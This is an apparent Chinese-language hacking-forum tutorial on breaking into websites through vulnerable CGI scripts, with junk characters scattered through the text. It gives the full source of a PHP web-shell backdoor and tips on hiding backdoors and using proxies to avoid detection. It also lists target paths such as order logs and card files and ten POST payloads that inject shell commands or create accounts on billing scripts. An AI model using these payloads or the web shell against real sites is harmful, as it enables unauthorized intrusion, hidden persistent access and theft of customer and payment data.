CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
% A- `. p' }& t3 ?大家好 我是bboyhip  只是一名菜菜的exploiter
  M2 q& @" \' V+ S很开心来到贵论坛
0 ^3 y! W, U; ~这里让我感觉 很有技术交流的感觉
我会长长来玩的
: a8 p( e2 w' w) m" @* X" D前言:
3 T1 y3 U( h! j- |  E以下讲解针对欧美日本网站
3 ^1 N5 F: ?- {當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
. [+ z/ _+ _- m所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
; T2 J/ U2 y: n* R2 p6 p
9 x4 \% s& z* ?% ?6 {/ A只是个人在实务上一些经验
写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手

* H3 f+ u" ^. y1 F  R# p7 z以下内容跟帖回复才能看到
==============================
/ R8 r& W5 Q- Q- v, n
$ \* Y4 k$ b- u8 M+ t7 E第1部份: 何谓Shell?
) C& d3 J, ^. G7 \: I( |: vShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
: w! ^8 l$ w' e; k- B' _4 R+ gA shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

/ w# }: k6 x) v) p对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
" r+ f3 ]3 G7 v/ k- b. M所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
" s* P3 Z$ U# m3 r以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
# G9 w" N' M5 U: M; H如 /home/www/site.com/cgi-bin/
8 u) u; D$ b4 s: t6 \0 S9 N/ lls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
7 v9 J9 Z( O( r+ Nls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
; w5 b4 s" x0 ccat: 显示档案内容
/ [2 h6 j" R0 mcat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
$ A( F5 \: A+ M/ Ocat /etc/passwd: 显示 /etc/passwd 这个档案的内容
/ e) W# b; A& Z5 Gwho: 显示谁login 至系统
$ m1 O# @; i3 ~3 \man: 显示指令用法  
7 P5 F5 t' {4 p# F% Mman ls: 显示ls这指令的用法  
# V0 L) @# i! xmkdir 建立目录
rmdir 删除目录
; O2 i$ X6 b7 H3 x7 t* Pmv 移动档案
2 X" H2 z2 t4 c9 x- V, u& p( Wrm 删除档案
: y& x! S* y- @) {5 @
第3部份: Shell的使用
) R7 l6 v& d1 k" _" W! f例如:
8 W' K! S0 X6 b$ \http://site.com/refer.php
5 k! ]$ @, [# S% }& W0 M这是我的後门, 原代码如下:
; y) i. ]7 \1 `3 a& j! y* S4 Q2 q<Form Action="#" Method="POST">
5 `& N1 q$ _9 \  y- Q<Input type="text" name="cmd">
<Input type="Submit">
</Form>
, q  _: @% [! p) U7 ?  Z<?php
% C+ e- e( U- o7 {$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
echo $Output;
- {' M* c* ^/ s. k* f( z$ ??>
- O: w% m. D2 Y5 Q输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
7 |5 }3 i  I! [) _  Z
第4部份: 注意事项
- 使用匿名代理, 保障自己
4 i  _6 D3 t) x# L. P/ D- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
' M- F! C: F, }- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
1 s7 {  |4 T, A0 ?这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
在这里提供一些方法思路让大家学习一下
' s! o, w* T& V5 P; J+ _
( k4 m8 ^$ [5 t$ I- `; t4 H# S1.一开始对一个网站进行cgi漏洞扫描
- P% ?/ s% o! h, V/ B6 ]我们需要的东西有
! m, M# @3 x8 l5 a) N! c扫洞工具 如:triton..等等
1 w/ y* F& W  iE表
$ \4 D2 F7 K6 z( O6 ?如
. G1 a: [# m7 ?. P7 l- o4 ?/cgi-bin/add-passwd.cgi
: P2 w( D; q; W+ T9 |/ C/WebShop/templates/cc.txt
' W2 ?: i# S# F+ b6 X2 v/Admin_files/order.log
; v" X2 I9 w8 ~$ B. I/orders/mountain.cfg
/cgi-sys/cart.pl
3 P! W8 q$ D/ `% W8 h4 r5 g" h/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

4 v- A2 ~9 _3 b3 D; V7 ^9 m9 s2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
4 G* t- a1 u9 x5 F- U& u: RERROR:This script should be referenced with a METHOD of POST.
# y. a; J/ D$ D7 Q! n- }没有返回一定是假的
/ _8 u: `, g) b: `; _) N3 B& C1 S3.重来来了 很多人都会问我
7 W3 z: P9 b5 |7 ^他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
% n  J+ R+ t/ [+ ~) z% c我们要找post 的方法很多
0 v; d$ A) x6 @1 b" c7 C. X可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
wei=ren&gen=command
" S: Z# z4 z) t" S/passmaster.cgi
2 F/ m, x: {) I4 P- N$ Q0 QAction=Add&Username=Username&Password=Password
! f, Q  {6 C5 D9 v/accountcreate.cgi
! t7 a5 a$ V/ A9 ~username=username&password=password&ref1=|echo;ls|
/form.cgi
7 y) s) x/ \1 x  Mname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
% l+ k- j7 Q7 T6 d: h( w/cgi-bin/EuroDebit/addusr.pl
/ t; R/ R; n- Q2 F" Euser=username&pass=Password&confirm=Password
/ccbill-local.asp
1 y, |1 y  Q6 ^6 ]/ e+ @) {$ O: z& npost_values=username:password
0 a# W8 l) k$ O6 W/count.cgi
/ f) Y4 H0 i  q8 U' _9 Cpinfile=|echo;ls -la;exit|
# A  L8 g$ K2 m7 ^3 a" l/recon.cgi
6 ~; o! B" @5 p, g; G$ a/recon.cgi?search
  W+ B# d# v: Qsearchoption=1&searchfor=|echo;ls -al;exit|
$ M3 D9 k4 }4 a1 N  U/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|
+ |& v4 u0 I( U8 D5 ]+ c" J( v- x
今天就讲到这  感谢大家支持
5 N6 }9 d1 m8 M